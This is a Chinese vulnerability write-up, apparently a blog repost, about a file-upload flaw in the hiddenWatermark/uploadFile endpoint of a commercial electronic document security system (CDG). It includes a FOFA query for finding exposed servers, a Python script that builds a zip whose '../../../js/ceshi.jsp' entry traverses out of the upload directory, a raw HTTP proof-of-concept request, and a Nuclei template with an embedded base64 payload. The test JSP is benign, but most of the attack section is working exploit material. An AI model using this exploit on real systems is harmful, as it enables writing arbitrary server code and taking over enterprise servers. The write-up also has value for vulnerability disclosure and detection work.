亿某通电子文档安全管理系统 hiddenWatermark/uploadFile 文件上传漏洞

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

亿某通新一代电子文档安全管理系统(简称:CDG)是一款融合文档加密、数据分类分级、访问控制、关联分析、大数据分析、智能识别等核心技术的综合性数据智能安全产品。产品包括透明加密、智能加密、权限文档、数据分类分级、终端安全管理、文件外发管理、集团管控、数据安全网关、加解密接口中间件、U盘客户端十大核心组件,保护范围涵盖终端电脑(Windows、Mac和Linux系统平台)、智能终端(Android、IOS)以及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等),能够对企业核心数据资产从生产、存储、流转、外发到销毁进行全生命周期保护。通过对"有意"、"无意"两种数据泄漏行为作统一防护,采用"事前主动防御,事中实时控制,事后及时追踪,全面防止泄密"的设计理念,配合身份鉴别、数据分类、密级标识、权限控制、应用集成、安全接入、风险预警以及行为审计等能力,全方位保障用户终端数据安全。

亿某通电子文档安全管理系统 hiddenWatermark/uploadFile接口处存在文件上传漏洞,恶意攻击者可能上传恶意文件进而获取服务器的控制权限

漏洞成因:恶意攻击者可以通过特定方式将文件上传到服务器的特定位置,获取系统权限,数据包中可能包含明显的目录遍历痕迹,如使用../等路径。攻击者通过这种方式尝试读取任意文件。

漏洞危害:恶意攻击者可能会利用此漏洞在服务器上执行恶意代码文件,或者上传执行勒索软件,导致数据泄露。

Ⅱ、fofa语句

复制代码
body="/CDGServer3/index.jsp"

Ⅲ、漏洞复现

1、使用py文件构造压缩包脚本

复制代码
import zipfile
 
def tests(evil_file_name, zip_data):
    with zipfile.ZipFile(evil_file_name, 'w') as zip_file:
        for key, value in zip_data.items():
            print("Key:", key)
 
            # 重命名文件
            zip_info = zipfile.ZipInfo(key)
            zip_info.compress_type = zipfile.ZIP_DEFLATED
            zip_file.writestr(zip_info, value)
 
# 定义 zipData 字典
zip_data = {
    "../../../js/ceshi.jsp": "<%\n out.println(\"Hello World!\");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>",
    "theme/theme/theme1.xml": "<!--{\"FileName\":\"aaa\",\"FileSize\":\"222\",\"UserName\":\"aa\",\"Department\":\"aa\",\"UserID\":\"aa\",\"time\":\"123\"}-->"
}
 
try:
    tests("ceshi.zip", zip_data)
except Exception as e:
    print(e)

2、生成压缩包文件

POC

复制代码
POST /CDGServer3/hiddenWatermark/uploadFile HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3lm0J8uEuFHxy191
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,
*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
 
------WebKitFormBoundary3lm0J8uEuFHxy191
Content-Disposition: form-data; name="doc"; filename="ceshi.zip"
Content-Type: application/zip
 
{{file(压缩包文件路径)}}
------WebKitFormBoundary3lm0J8uEuFHxy191--

1、构建poc

2、访问

复制代码
https://127.0.0.1/CDGServer3/上传文件路径
https://127.0.0.1/CDGServer3/js/ceshi.jsp

Ⅳ、Nuclei-POC

复制代码
id: CDG-hiddenWatermark-uploadFile-uploadfile

info:
  name: 亿某通电子文档安全管理系统 hiddenWatermark/uploadFile接口处存在文件上传漏洞 攻击者可通过该漏洞在服务器端任意执行代码 写入后门, 获取服务器权限 进而控制整个 web 服务器
  author: WLF
  severity: high
  metadata: 
    fofa-query: body="/CDGServer3/index.jsp"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /CDGServer3/hiddenWatermark/uploadFile HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3lm0J8uEuFHxy191
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        Content-Length: 0

        ------WebKitFormBoundary3lm0J8uEuFHxy191
        Content-Disposition: form-data; name="doc"; filename="{{filename}}.zip"
        Content-Type: application/zip
        
        {{base64_decode("UEsDBBQAAAAIAAAAIQD5T26PZgAAAHAAAAAVAAAALi4vLi4vLi4vanMvY2VzaGkuanNwHcgxDsIwDAXQnVOESpXixRcoYkSMCAZmq/0CIysOqVuuD2V879Dvki/BtWkJK7k7w8zT3ZtN+46Ggk96ySqszic1ZKnVdJRQL/xAXCF2kXjmhveCOba7oa2G+DcR8YSfkGlI/fELUEsDBBQAAAAIAAAAIQDGTjiHSQAAAGcAAAAWAAAAdGhlbWUvdGhlbWUvdGhlbWUxLnhtbLNR1NWtVnLLzEn1S8xNVbJSSkxMVNIBCwRnVoEEjIyMgAKhxalFcBVAvktqQWJRSW5qXglMBKTC0wXGK8kEqzU0Mlaq1dW1AwBQSwECFAAUAAAACAAAACEA+U9uj2YAAABwAAAAFQAAAAAAAAAAAAAAgAEAAAAALi4vLi4vLi4vanMvY2VzaGkuanNwUEsBAhQAFAAAAAgAAAAhAMZOOIdJAAAAZwAAABYAAAAAAAAAAAAAAIABmQAAAHRoZW1lL3RoZW1lL3RoZW1lMS54bWxQSwUGAAAAAAIAAgCHAAAAFgEAAAAA")}}
        ------WebKitFormBoundary3lm0J8uEuFHxy191--
        

      - |
        GET /CDGServer3/js/ceshi.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"Hello World!")

Ⅴ、修复建议

升级至安全版本

相关推荐
没有bug.的程序员1 小时前
JAVA面试宝典 -《安全攻防:从 SQL 注入到 JWT 鉴权》
java·安全·面试
学习溢出3 小时前
【网络安全】理解安全事件的“三分法”流程:应对警报的第一道防线
网络·安全·web安全·网络安全·ids
鹿鸣天涯3 小时前
《红蓝攻防:构建实战化网络安全防御体系》
安全·web安全
前端小巷子6 小时前
深入理解XSS攻击
前端·安全·面试
代码改变世界ctw8 小时前
2.2 TF-A在ARM生态系统中的角色
汇编·arm开发·安全·trustzone·atf·optee
Bruce_Liuxiaowei11 小时前
dict协议在网络安全中的应用与风险分析
网络·安全·web安全·伪协议
FreeBuf_12 小时前
蓝牙协议栈高危漏洞曝光,攻击可入侵奔驰、大众和斯柯达车载娱乐系统
安全·web安全·娱乐
言之。20 小时前
借助ssh实现web服务的安全验证
运维·安全·ssh
前端世界21 小时前
鸿蒙系统安全机制全解:安全启动 + 沙箱 + 动态权限实战落地指南
android·安全·harmonyos
智驱力人工智能1 天前
极端高温下的智慧出行:危险检测与救援
人工智能·算法·安全·行为识别·智能巡航·高温预警·高温监测